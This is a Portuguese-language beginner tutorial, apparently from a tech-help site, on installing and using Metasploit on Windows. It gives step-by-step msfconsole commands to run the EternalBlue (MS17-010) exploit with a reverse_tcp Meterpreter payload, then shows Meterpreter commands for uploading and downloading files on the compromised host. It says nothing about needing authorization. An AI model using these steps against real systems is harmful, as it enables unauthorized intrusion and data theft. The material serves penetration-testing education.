Remember to maintain security and privacy. Do not share sensitive information. Procedimento.com.br may make mistakes. Verify important information. Termo de Responsabilidade

Como utilizar o Metasploit no Windows: Guia Completo para Iniciantes

O Metasploit é uma das ferramentas mais poderosas e amplamente utilizadas para testes de penetração e segurança cibernética. Originalmente desenvolvido para sistemas baseados em Unix, ele também pode ser utilizado no ambiente Windows. Este artigo tem como objetivo mostrar como instalar e utilizar o Metasploit no Windows, incluindo exemplos práticos para ilustrar seu uso.

Instalação do Metasploit no Windows:

  1. Baixe o instalador do Metasploit: Visite o site oficial do Metasploit e baixe a versão mais recente do Metasploit Framework para Windows.

  2. Execute o instalador: Clique duas vezes no arquivo baixado para iniciar o processo de instalação. Siga as instruções na tela para completar a instalação.

  3. Configuração inicial: Após a instalação, abra o Metasploit Console. Você pode fazer isso pesquisando por "Metasploit" no menu Iniciar e clicando no ícone do Metasploit Console.

Exemplos:

  1. Iniciando o Metasploit Console: Após a instalação, você pode iniciar o Metasploit Console diretamente pelo menu Iniciar ou via CMD. Para iniciar via CMD, use o seguinte comando:

    msfconsole

  2. Exploração de vulnerabilidades: Vamos explorar uma vulnerabilidade comum em um servidor Windows. Suponha que temos um servidor Windows vulnerável ao exploit MS17-010 (EternalBlue).

    • Primeiro, inicie o Metasploit Console:

      msfconsole

    • Carregue o módulo de exploit para MS17-010:

      use exploit/windows/smb/ms17_010_eternalblue

    • Configure o alvo (target) e o payload:

      set RHOST <IP_DO_ALVO>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <SEU_IP>

    • Execute o exploit:

      exploit

    Se o exploit for bem-sucedido, você terá uma sessão Meterpreter aberta, permitindo controle total sobre o sistema alvo.

  3. Utilizando o Meterpreter: Após obter acesso ao sistema alvo, você pode executar vários comandos Meterpreter para explorar e manipular o sistema. Alguns exemplos incluem:

    • Listar arquivos no diretório atual:

      ls

    • Fazer upload de um arquivo para o sistema alvo:

      upload <CAMINHO_DO_ARQUIVO_LOCAL> <CAMINHO_DO_DESTINO_NO_ALVO>

    • Fazer download de um arquivo do sistema alvo:

      download <CAMINHO_DO_ARQUIVO_NO_ALVO> <CAMINHO_DO_DESTINO_LOCAL>

To share Download PDF

Windows CMD Metasploit msfconsole exploit Meterpreter MS17-010 EternalBlue segurança cibernética testes de penetração

Gostou do artigo? Deixe sua avaliação!
Sua opinião é muito importante para nós. Clique em um dos botões abaixo para nos dizer o que achou deste conteúdo.